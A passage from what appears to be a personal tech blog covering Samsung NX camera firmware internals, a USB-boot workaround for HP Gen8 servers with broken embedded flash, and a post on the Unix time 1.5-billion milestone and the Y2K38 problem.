As shown above, Samsung has a history of working with Milbeaut and µITRON, so it's probably not a stretch to conclude that this combination powers the S4 Zoom's camera, but it's hard to say if it's a logical core inside the Exynos 4212 or a dedicated chip.
Galaxy NX: EK-GN100, EK-GN120
Just one week after the S4 Zoom, still in June 2013, Samsung announced the Galaxy NX (EK-GN100, EK-GN120) with interchangeable lenses, 20.3MP APS-C sensor, and DRIMeIV SoC - specs already known from January's NX300.
But the Galaxy NX is also an Android 4.2 smartphone (even if it lacks microphone and speakers, so technically just a micro-tablet?). How can it be a DRIMeIV Linux device and an Android phone at the same time? The firmware surely will enlighten us!
Similarly to the S4 Zoom, the firmware is a ZIP file containing a
[...]_HOME.tar.md5
. One of the files inside it is camera.bin
, and this
time it's 77MB! This file now features the SLP\x00
header known from the
NX300:
camera.bin: GALAXYU firmware 0.01 (D20D0LAHB01) with 5 partitions
144 5523488 f68a86 ffffffff vImage
5523632 7356 ad4b0983 7fffffff D4_IPL.bin
5530988 63768 3d31ae89 65ffffff D4_PNLBL.bin
5594756 2051280 b8966d27 543fffff uImage
7646036 71565312 4c5a14bc 4321ffff platform.img
The platform.img
file contains a UBIFS root partition, and presumably vImage
is used for upgrading the DRIMeIV firmware, and uImage is the standard kernel
running on the camera SoC. The rootfs is very similar to the NX300 as well,
featuring the same "squeeze/sid" string in /etc/debian_version
, even though
it's again Tizen / Samsung Linux Platform. There is a 500KB
/usr/bin/di-galaxyu-app
that's probably responsible for camera operation
as well as for talking to the Android CPU. Further reverse engineering is
required to understand what kind of IPC mechanism is used between the cores.
The Galaxy NX got the CES 2014 award for the first fully-connected interchangeable lens camera, but probably not for fully-connecting a SoC running Android-flavored Linux with a SoC running Tizen-flavored Linux on the same board.
Galaxy Camera 2
Shortly after the Galaxy NX, the Galaxy Camera 2 (EK-GC200) was announced and presented at CES 2014.
Very similar to the first Galaxy Camera, it has a 1.2MB
/vendor/firmware/fimc_is_fw.bin
file, and also shares most of the strings
with it. Apart from a few changed internal SVN URLs, this seems to be roughly
the same module.
Galaxy K Zoom: SM-C115, SM-C111, SM-C115L
As already identified above, the Galaxy K
Zoom
(SM-C115, SM-C111, SM-C115L), released in June 2014, is using the M7M image
processor. The respective firmware can be found inside the Android rootfs at
/vendor/firmware/RS_M7MU.bin
and is 6.2MB large. It also features the same
compression mechanism as the NX mini firmware, making it harder to analyze,
but the M7MU firmware header looks more consistent:
Header | Value |
---|---|
code_size | 0x5dee12 (6155794) |
offset_code | 0x40000 (262144) |
version1 | "00.01" |
log | "201405289234" |
version2 | "D20FSHE" |
model | "06DAGCM2" |
Rumors of unreleased models
During (and after) Samsung's involvement in the camera market, there were many rumors of shiny new models that didn't materialize. Here is an attempt to classify the press coverage without any insider knowledge:
Samsung NX-R (concept design, R for retro?), September 2012 - most probably an early name of the NX2000 (the front is very similar, no pictures of the back).
Samsung NX400 / NX400-EVF, July 2014 - looks like the NX400 was renamed to NX500, and an EVF version never materialized.
Samsung NX2 prototype, February 2018 - might be a joke/troll or an engineer having some fun. Three years after closing the camera department, it's hard to imagine that somebody produced a 30MP APS-C sensor out of thin air, added a PCB with a modern SoC to read it out, and created (preliminary) firmware.
Samsung NX Ultra, April 1st 2020, 'nuff said.
Conclusion
In just five years, Samsung released eighteen cameras and one smartphone/camera hybrid under the NX label, plus a few more phones with zoom lenses, built around the Fujitsu Milbeaut SoC as well as multiple generations of Samsung's custom-engineered (or maybe initially licensed from Fujitsu?) DRIM engine.
The number of different platforms and overlapping release cycles is a strong indication that the devices were developed by two or three product teams in parallel, or maybe even independently of each other. This engineering effort could have proven a huge success with amateur and professional photographers, if it hadn't been stopped by Samsung management.
To this day, the Tizen-based NX models remain the best trade-off between picture quality and hackability (in the most positive sense of the word).
(*) All pictures (C) Samsung marketing material
This post describes how to start "Intelligent Provisioning" or the "HP Smart Storage Administrator (ACU / SSA)" on a Gen8 server with a broken NAND, so that you can change the boot disk order. It has been successfully tested on the HPE MicroServer Gen8 as well as on a ProLiant ML310e Gen8, using either a USB drive or a µSD / SD card with at least 1GB of capacity.
Update 2021-05-17: to consistently boot from an SSD in port 5, switch to Legacy SATA mode. See below for details.
Changing the Boot Disk
HP Gen8 servers in AHCI mode will always try to boot from the first disk in the (non-)hot-swap drive bay, and completely ignore the other disks you have attached.
The absolutely non-obvious way to change the boot device, as outlined in a well-hidden comment on the HP forum, is:
- Change the SATA mode from "AHCI" to "RAID" in BIOS
- Ignore the nasty red and orange warning about losing all your data
- Boot into HP "Smart" Storage Administrator
- Create a single logical disk of type RAID0
- Add the desired boot device (and only it!) to the RAID0
- Profit!
The disks in the drive bay will become invisible as boot devices / to your GRUB, but they will keep working as before under your operating system, and there seems to be no negative impact on the boot device either.
This is great advice, provided that you are actually able to boot into SSA (by
pressing F5
at the right moment during your bootup process).
WARNING / Update 2020-10-07: apparently, booting from an SSD on the ODD port (SATA port 5) is not supported by HPE, so it is a pure coincidence that it is possible to set up, and your server will eventually forget the RAID configuration of the ODD port, falling back to whatever boot device is in the first non-hot-plug bay. This has happened to me on the ML310e, but not on the MicroServer (as reported in the forum) yet.
Update 2021-05-17: after another reboot-induced RAID config loss, I have done some more research and found this suggestion to switch to Legacy SATA mode. Another source in German. I have followed it:
- Reboot into BIOS Setup (press F9), switch to Legacy SATA: System Options → SATA Controller Options → Embedded SATA Configuration → SATA Legacy Support
- Reboot into BIOS Setup (press F9), switch the boot controller order: Boot Controller Order → Ctlr:2
- Optional 😉: shut down the box and swap the cables on ports 5 and 6.
- Profit!
My initial fear that the "Legacy" mode would cause a performance downgrade so far didn't materialize. The devices are still operated in the fastest SATA mode supported on the respective port, and NCQ seems to work as well.
The Error Message
However, for some time now, my HP MicroServer Gen8 has been showing one of those nasty NAND / Flash / SD-Card / whatever error messages:
- iLO Self-Test reports a problem with: Embedded Flash/SD-CARD. View details on Diagnostics page.
- Controller firmware revision 2.10.00 Partition Table Read Error: Could not partition embedded media device
- Embedded Flash/SD-CARD: Embedded media initialization failed due to media write-verify test failure.
- Embedded Flash/SD-CARD: Failed restart..
..or a variation thereof. I have ignored it because I thought it referred to the SD card and it didn't impact the server in noticeable ways.
At least not until I wanted to make the shiny new SSD that I bought the
default boot device for the server, which is when I realized that neither the
F5
key to run HP's "Smart" Storage Administrator tool, nor the F10
key
for the "Intelligent" Provisioning tool (do you notice a theme on their
naming?) had any effect on the boot process.
The "Official" Solution
The general advice from the Internet to "fix" this error is to repeat the following steps in random order, multiple times:
- Disconnect mains power for some minutes
- "Format Embedded Flash and reset iLO" from the iLO web interface
- "Reset iLO" from the iLO web interface
- Reset the CMOS settings from the F9 menu
- Reset the iLO settings via mainboard jumpers
- Downgrade iLO to 2.54
- Upgrade iLO to the latest version
- Send a custom XML via HPQLOCFG.exe
And once the error is fixed, to boot the Intelligent Provisioning Recovery Media to put back the right data onto the NAND.
I've tried the various suggestions (except for the iLO downgrade, because the HTML5 console introduced in 2.70 is the only one not requiring arcane legacy browsers), but the error remained.
So I tried to install the provisioning recovery media nevertheless, but it failed with the anticipated "Error flashing the NVRAM":
(it will not boot the ISO if you just dd
it to a USB flash drive, but you
can put it on a DVD or use the "Virtual Media" gimmick on a licensed iLO)
If none of the above "fixes" work, then your NAND chip is probably faulty indeed and thus the final advice given is:
- Contact HPE for a replacement motherboard
However, my MicroServer is out of warranty and I'm not keen on waiting for weeks or months for a replacement and shelling out real money on top.
Booting directly into SSA / IP
But that fancy HPIP171.2019_0220.23.iso
we downloaded to repair the
NAND surely contains what we need, in some heavily obfuscated form?
Let's mount it as a loopback device and find out!
# mount HPIP171.2019_0220.23.iso -o loop /media/cdrom/
# cd /media/cdrom/
# ls -al
total 65
drwxrwxrwx 1 root root 2048 Feb 21 2019 ./
drwxr-xr-x 5 root root 4096 Sep 11 18:41 ../
-rw-rw-rw- 1 root root 34541 Feb 21 2019 back.jpg
drwxrwxrwx 1 root root 2048 Feb 21 2019 boot/
-r--r--r-- 1 root root 2048 Feb 21 2019 boot.catalog
drwxrwxrwx 1 root root 2048 Feb 21 2019 efi/
-rw-rw-rw- 1 root root 2913 Feb 21 2019 font_15.fnt
-rw-rw-rw- 1 root root 3843 Feb 21 2019 font_18.fnt
drwxrwxrwx 1 root root 2048 Feb 21 2019 ip/
drwxrwxrwx 1 root root 2048 Feb 21 2019 pxe/
drwxrwxrwx 1 root root 6144 Feb 21 2019 system/
drwxrwxrwx 1 root root 2048 Feb 21 2019 usb/
# du -sm */
2 boot/
5 efi/
916 ip/
67 pxe/
30 system/
4 usb/
# ls -al ip/
total 937236
drwxrwxrwx 1 root root 2048 Feb 21 2019 ./
drwxrwxrwx 1 root root 2048 Feb 21 2019 ../
-rw-r-xr-x 1 root root 125913644 Feb 21 2019 bigvid.img.gz*
-rw-r-xr-x 1 root root 706750514 Feb 21 2019 gaius.img.gz*
-rw-r-xr-x 1 root root 114 Feb 21 2019 manifest.json*
-rw-rw-rw- 1 root root 140 Feb 21 2019 md5s.txt
-rw-rw-rw- 1 root root 164 Feb 21 2019 sha1sums.txt
-rw-r-xr-x 1 root root 127058868 Feb 21 2019 vid.img.gz*
# zcat ip/gaius.img.gz | file -
/dev/stdin: DOS/MBR boot sector
The ip
directory contains the largest payload of that ISO, and all three
.img.gz
files look like disk images, with exactly 256MB (vid
), 512MB
(bigvid
) and 1024MB (gaius
) extracted sizes.
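(The uncompressed sizes can be read from the gzip ISIZE footer without actually extracting anything; that field is only the size modulo 4GB, but all three images stay below that. A quick sketch:)

```python
import struct
import sys

# The last four bytes of a gzip stream (ISIZE) store the uncompressed size
# modulo 2**32 -- exact for these images, since all of them stay below 4GB.
for path in sys.argv[1:]:                      # e.g. ip/vid.img.gz ip/gaius.img.gz
    with open(path, "rb") as f:
        f.seek(-4, 2)                          # jump to the ISIZE footer
        size = struct.unpack("<I", f.read(4))[0]
    print(f"{path}: {size / 2**20:.0f} MiB uncompressed")
```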
Following the "bigger is better" slogan, let's write the biggest one,
gaius.img.gz
to an USB flash drive and see what happens!
# # replace /dev/sdc below with your flash drive device!
# zcat gaius.img.gz |dd of=/dev/sdc bs=1M status=progress
... wait a while ...
# reboot
Then, on boot-up, select the "USB DriveKey" option:
And you will be greeted by a friendly black & white GRUB loader, offering you "Intelligent" Provisioning and "Smart" Storage Administrator, which you can promptly and successfully boot:
From here, you can create a single logical volume of type RAID0, add just your boot disk into it, restart and be happy!
The Bill-and-a-half-ennium
Tonight (2017-07-14), at or around 02:40:00 GMT, the Unix time will have a value of 1 500 000 000 seconds, counting from January 1st, 1970. The last event of this kind, when Unix time reached 1 000 000 000 seconds, was on September 9th, 2001, when the world was still a nice and good place. Because that was a billion seconds, some people incorrectly called it the "Billennium". Yours truly actually stayed up late enough (01:46 GMT) to celebrate the event with a hacker friend.
If you want to celebrate this special decimal representation of an arcane time measure, there is a nice countdown page!
The next one of this kind, 2 000 000 000, will be in 2033, so you better party hard this time!
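If you want to double-check these dates, Python will happily do the conversion:

```python
from datetime import datetime, timezone

# Convert the "round" Unix timestamps into human-readable UTC dates.
for seconds in (1_000_000_000, 1_500_000_000, 2_000_000_000):
    date = datetime.fromtimestamp(seconds, tz=timezone.utc)
    print(f"{seconds:>13,} -> {date:%Y-%m-%d %H:%M:%S} UTC")
```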
The Year 2038 Problem (Y2K38)
This is also a good reminder of the many systems that are still using Unix time internally, and the legacy and embedded ones that store it in a 32-bit signed integer. Because this kind of integer overflows at 2 147 483 647, which will happen in 2038, all kinds of problems are expected.
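The whole problem fits into a few lines of Python, using ctypes to emulate a signed 32-bit time_t:

```python
import ctypes
from datetime import datetime, timezone

# The largest value a signed 32-bit time_t can hold, and what happens one
# second later, when the value wraps around to a large negative number.
limit = 2**31 - 1                                        # 2 147 483 647
print(datetime.fromtimestamp(limit, tz=timezone.utc))    # 2038-01-19 03:14:07+00:00
wrapped = ctypes.c_int32(limit + 1).value                # simulate the overflow
print(wrapped)                                           # -2147483648
print(datetime.fromtimestamp(wrapped, tz=timezone.utc))  # back to December 1901
```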
There is already a great writeup on the current state of affairs regarding Y2K38 support, so instead of an in-depth technical analysis I'm going to provide a personal anecdote.
My first encounter with Y2K38 was in 2002 - a phone call from a relative who had trouble logging into an SSH server using PuTTY. It took some time to figure out the root cause - a dead CMOS battery in the PC led to incorrect clock values, bringing the machine far into the future, some time into the 2040s.
Being a good citizen, I reported the bug to the developers (with a detailed explanation of the setup and a stack trace), and got a rather laconic answer:
Date: 11 Feb 2002 22:54:52
Subject: putty crashing on time() overflow
Georg Lukas writes:
putty is crashing with an access violation when you try to connect to a host and it is after time() goes over 2^31 (i.e. after Tue, 19 Jan 2038 04:14:07 +0100).
Thanks for the timely bug report. With a bit of luck we'll fix this one before it becomes a problem for too many users.
(S)
I haven't quite followed up, but recent versions of PuTTY, on a recent 64-bit Windows, don't exhibit this problem any more, so it looks like we are safe!
Future
While we still have a bit more than 20 years to fix Y2K38, I'm sure that there will be plenty of legacy 32-bit systems running when the date approaches. As with Y2K, there will be denial, anger, bargaining, depression and acceptance. And maybe a big boom that brings down the whole IT landscape, however it might look in 20 years.
One way or the other, I will be a professional Y2K38 consultant with 36 years of working experience! Please contact me soon so I can ensure a timely retirement to some far-away island before day X! ;-)